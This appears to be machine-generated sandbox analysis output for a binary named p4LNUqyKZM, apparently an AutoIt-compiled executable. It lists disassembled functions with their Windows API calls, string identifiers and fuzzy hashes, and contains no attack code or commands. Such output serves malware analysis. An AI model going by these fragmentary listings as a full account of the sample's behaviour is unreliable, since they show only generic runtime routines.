                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-3080491070
                        • Opcode ID: f9f2279c75ce2c217a6d604a827ff0f440d4f6b28f52fa80fafc3226ea275aa6
                        • Instruction ID: 9bb19e9ed142933a1e9474634171a07db2a39b520d3b2279cd86eaf359d83233
                        • Opcode Fuzzy Hash: f9f2279c75ce2c217a6d604a827ff0f440d4f6b28f52fa80fafc3226ea275aa6
                        • Instruction Fuzzy Hash: 76518A3190020ABADF15EBE0CD56FFEB378AF94340F248465F109721A2EB252F59CB61
                        Function 009EB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                        • API String ID: 1256254125-769500911
                        • Opcode ID: 862d882d4c1fd897d2ad7dd969194d5a1402dfbb436d95d66577657a6ed14b0c
                        • Instruction ID: 3a4ab3a6adb5e2f3e12b99c5cf7fe06ab766c1d8a93a3b13d5ee66bc636452ad
                        • Opcode Fuzzy Hash: 862d882d4c1fd897d2ad7dd969194d5a1402dfbb436d95d66577657a6ed14b0c
                        • Instruction Fuzzy Hash: E841E732A000679ACB216F7E88905BFB7A9BBE1F74B244529E521DB284E735CD81C790
                        Function 009F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F53A0
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009F5416
                        • GetLastError.KERNEL32 ref: 009F5420
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 009F54A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: e953a4c82f35a80aaf4b2f5bfdeacec05f96876ea107936482bd7dde76c2cd3c
                        • Instruction ID: a54458714496d86bc422171cad3241f279cfef3ccdcb4248c23ecf283fff4f5b
                        • Opcode Fuzzy Hash: e953a4c82f35a80aaf4b2f5bfdeacec05f96876ea107936482bd7dde76c2cd3c
                        • Instruction Fuzzy Hash: DC31B075A006099FC710DF68C484BFABBB8EF45309F198069E605CB3A2D731DD82CBA1
                        Function 00A13C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateMenu.USER32 ref: 00A13C79
                        • SetMenu.USER32(?,00000000), ref: 00A13C88
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A13D10
                        • IsMenu.USER32(?), ref: 00A13D24
                        • CreatePopupMenu.USER32 ref: 00A13D2E
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A13D5B
                        • DrawMenuBar.USER32 ref: 00A13D63
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                        • String ID: 0$F
                        • API String ID: 161812096-3044882817
                        • Opcode ID: d373823475363c3ce1fba9ac1fa1dba09545d4f916ad27cd759a979428d20f70
                        • Instruction ID: 9955965ab5080b1c3610fd4f9097749232e3c8e58bd8d9d796e3cde478085d9e
                        • Opcode Fuzzy Hash: d373823475363c3ce1fba9ac1fa1dba09545d4f916ad27cd759a979428d20f70
                        • Instruction Fuzzy Hash: 3D418A75A01209EFDF14CFA4E844BEA7BB6FF49364F144428F94697360D730AA11CB90
                        Function 00A13A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A13A9D
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A13AA0
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A13AC7
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A13AEA
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A13B62
                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A13BAC
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A13BC7
                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A13BE2
                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A13BF6
                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A13C13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: b8c8beca91a4c509a155a3fab42b2d19b8a2c60cc9718ba9046835a867ced0b4
                        • Instruction ID: 1d8fb2ddaddfb223e9473c8413334a48d112e03fbbb59de3cf387db68bb4d18a
                        • Opcode Fuzzy Hash: b8c8beca91a4c509a155a3fab42b2d19b8a2c60cc9718ba9046835a867ced0b4
                        • Instruction Fuzzy Hash: E6617A75900248EFDB10DFA8CC81EEE77B8EB09710F104199FA15EB2A1D774AE86DB50
                        Function 009EB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 009EB151
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB165
                        • GetWindowThreadProcessId.USER32(00000000), ref: 009EB16C
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB17B
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 009EB18D
                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB1A6
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB1B8
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB1FD
                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB212
                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB21D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: 7560840adcd413055d8c4e02156b03e7e336a9387eec811e6d3ca98d428d80d4
                        • Instruction ID: a5da461e82d2306748a3bec46f8a73c1b78b8b439dd2189a29d176de88c00e6d
                        • Opcode Fuzzy Hash: 7560840adcd413055d8c4e02156b03e7e336a9387eec811e6d3ca98d428d80d4
                        • Instruction Fuzzy Hash: 29317F76540344AFDF12DFA5DC44BAE7BADBFA1362F108005FA11D6290D7B49E428F64
                        Function 009B2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 009B2C94
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009B2CA0
                        • _free.LIBCMT ref: 009B2CAB
                        • _free.LIBCMT ref: 009B2CB6
                        • _free.LIBCMT ref: 009B2CC1
                        • _free.LIBCMT ref: 009B2CCC
                        • _free.LIBCMT ref: 009B2CD7
                        • _free.LIBCMT ref: 009B2CE2
                        • _free.LIBCMT ref: 009B2CED
                        • _free.LIBCMT ref: 009B2CFB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: a5d78b79a23f8599ee1b3f7cbced5f47ecb5ab8d672c7fe7606b1dc6e82db414
                        • Instruction ID: 64834dab36878a3764ac5f8550d2df23f2033d86de1d680e4e9841eaee6f24f4
                        • Opcode Fuzzy Hash: a5d78b79a23f8599ee1b3f7cbced5f47ecb5ab8d672c7fe7606b1dc6e82db414
                        • Instruction Fuzzy Hash: 11115976510108BFCB02EF54DA42DDD3BA5FF45360F5149A5F94C5F222DA31EE509B90
                        Function 00981410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00981459
                        • OleUninitialize.OLE32(?,00000000), ref: 009814F8
                        • UnregisterHotKey.USER32(?), ref: 009816DD
                        • DestroyWindow.USER32(?), ref: 009C24B9
                        • FreeLibrary.KERNEL32(?), ref: 009C251E
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C254B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 126b0f867ff7f01ff3387ffdd7af8689bd9de1aa07ad01914b47b22324ea9694
                        • Instruction ID: 0e5ef459f6c3a0a96a10b7c9c452fb27691fb348dac4675c9a882888e0744a86
                        • Opcode Fuzzy Hash: 126b0f867ff7f01ff3387ffdd7af8689bd9de1aa07ad01914b47b22324ea9694
                        • Instruction Fuzzy Hash: E8D14731B012128FCB19EF54C999F69F7A8BF45710F2442ADE44AAB362DB31AD12CF51
                        Function 009F7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009F7FAD
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F7FC1
                        • GetFileAttributesW.KERNEL32(?), ref: 009F7FEB
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 009F8005
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8017
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8060
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009F80B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile
                        • String ID: *.*
                        • API String ID: 769691225-438819550
                        • Opcode ID: dfaf3eea4530dd80b6ab5918b50a2691bfc6fd4147235f7a41757a5df63beb45
                        • Instruction ID: c890e22acd9b2ce9bd8d5d08c1dfc66c6f1575ec5e6c3a495c8bd31dc174a472
                        • Opcode Fuzzy Hash: dfaf3eea4530dd80b6ab5918b50a2691bfc6fd4147235f7a41757a5df63beb45
                        • Instruction Fuzzy Hash: E281AF715082099BCB20EF94C844ABAF3E8BF89314F584C5EFA95D7260EB34DD458B92
                        Function 00985BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 00985C7A
                          • Part of subcall function 00985D0A: GetClientRect.USER32(?,?), ref: 00985D30
                          • Part of subcall function 00985D0A: GetWindowRect.USER32(?,?), ref: 00985D71
                          • Part of subcall function 00985D0A: ScreenToClient.USER32(?,?), ref: 00985D99
                        • GetDC.USER32 ref: 009C46F5
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009C4708
                        • SelectObject.GDI32(00000000,00000000), ref: 009C4716
                        • SelectObject.GDI32(00000000,00000000), ref: 009C472B
                        • ReleaseDC.USER32(?,00000000), ref: 009C4733
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009C47C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 1c5be201fa5ae79157362fae69933f9981d264c5b04ac0160ab49829204f95fb
                        • Instruction ID: 6617c55a256eba91079bd95159b6b12b1ed8032e6a77478eb2a8a629d148892b
                        • Opcode Fuzzy Hash: 1c5be201fa5ae79157362fae69933f9981d264c5b04ac0160ab49829204f95fb
                        • Instruction Fuzzy Hash: 3571BC31A00205DFCF21DF64C9A4FEA3BB9FF4A364F144669ED555A2AAC3308851DF52
                        Function 009F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009F35E4
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • LoadStringW.USER32(00A52390,?,00000FFF,?), ref: 009F360A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-2391861430
                        • Opcode ID: 5e31bbe4c355802323f733320a87240b82ee4c84831d069d4d26e335e96cb9c8
                        • Instruction ID: f8c6f080c757e25164ab4cc444994bccf343113182004e112f0d5f05aee3e27c
                        • Opcode Fuzzy Hash: 5e31bbe4c355802323f733320a87240b82ee4c84831d069d4d26e335e96cb9c8
                        • Instruction Fuzzy Hash: D0514B7180020ABADF15FBA0CC46FFDBB78AF94350F148125F205722A1EB351B99DBA1
                        Function 009FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009FC272
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009FC29A
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009FC2CA
                        • GetLastError.KERNEL32 ref: 009FC322
                        • SetEvent.KERNEL32(?), ref: 009FC336
                        • InternetCloseHandle.WININET(00000000), ref: 009FC341
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3113390036-3916222277
                        • Opcode ID: 09ee38b0d90b73c6b6b9588c7cb575a8b25be7451cd5b3a098a1c4ed63428e7b
                        • Instruction ID: ad5e7aceedb66219e5a07d3a256c01556378cd9c4baa39b2ed1854e4fdaedd13
                        • Opcode Fuzzy Hash: 09ee38b0d90b73c6b6b9588c7cb575a8b25be7451cd5b3a098a1c4ed63428e7b
                        • Instruction Fuzzy Hash: 0A319AB160020CAFD721DFA48E88ABB7BFCEB49794B14C51EF546D2240DB74ED059B61
                        Function 009E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009C3AAF,?,?,Bad directive syntax error,00A1CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009E98BC
                        • LoadStringW.USER32(00000000,?,009C3AAF,?), ref: 009E98C3
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009E9987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString_wcslen
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 858772685-4153970271
                        • Opcode ID: ffd60f99588afb90a54bce0e49af26541803074f77c5125e107dfd2838c8cdba
                        • Instruction ID: 73ac59a034204345e0b8b154cc4abfe74bc5286b06ba00beae90d3ebb09f2466
                        • Opcode Fuzzy Hash: ffd60f99588afb90a54bce0e49af26541803074f77c5125e107dfd2838c8cdba
                        • Instruction Fuzzy Hash: 2721803194021ABBCF16EF90CC06FEE7739FF59700F04881AF519661A2EB759A18DB51
                        Function 009E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32 ref: 009E20AB
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 009E20C0
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009E214D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1290815626-3381328864
                        • Opcode ID: f14131541147006197e7b5658529dbc03efd708b1f5cc4d101d18ad40df8857a
                        • Instruction ID: 59ea73f9b92e4ee68a6e5370ae67a436d5160118f8b2cbb303cc5091c3bac9d0
                        • Opcode Fuzzy Hash: f14131541147006197e7b5658529dbc03efd708b1f5cc4d101d18ad40df8857a
                        • Instruction Fuzzy Hash: 7B11297A6CC706BAF6026331EC07EE6379CDF46324B200416FB04A50E2FEB5AD035654
                        Function 009BCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                        • String ID:
                        • API String ID: 1282221369-0
                        • Opcode ID: d20f90b118eb66445beff2f10914a7a212a2752b00edb4e2c197a70ffef8ad21
                        • Instruction ID: b66297b05868fdb54cc73603d252ad424516e943a95e6ba356de892f4e81b2e4
                        • Opcode Fuzzy Hash: d20f90b118eb66445beff2f10914a7a212a2752b00edb4e2c197a70ffef8ad21
                        • Instruction Fuzzy Hash: F76129B2905301BFDB21AFF49A81BFA7BA9EF45330F0445ADF944A7282E6319D018790
                        Function 00A150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A15186
                        • ShowWindow.USER32(?,00000000), ref: 00A151C7
                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A151CD
                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A151D1
                          • Part of subcall function 00A16FBA: DeleteObject.GDI32(00000000), ref: 00A16FE6
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A1520D
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A1521A
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A1524D
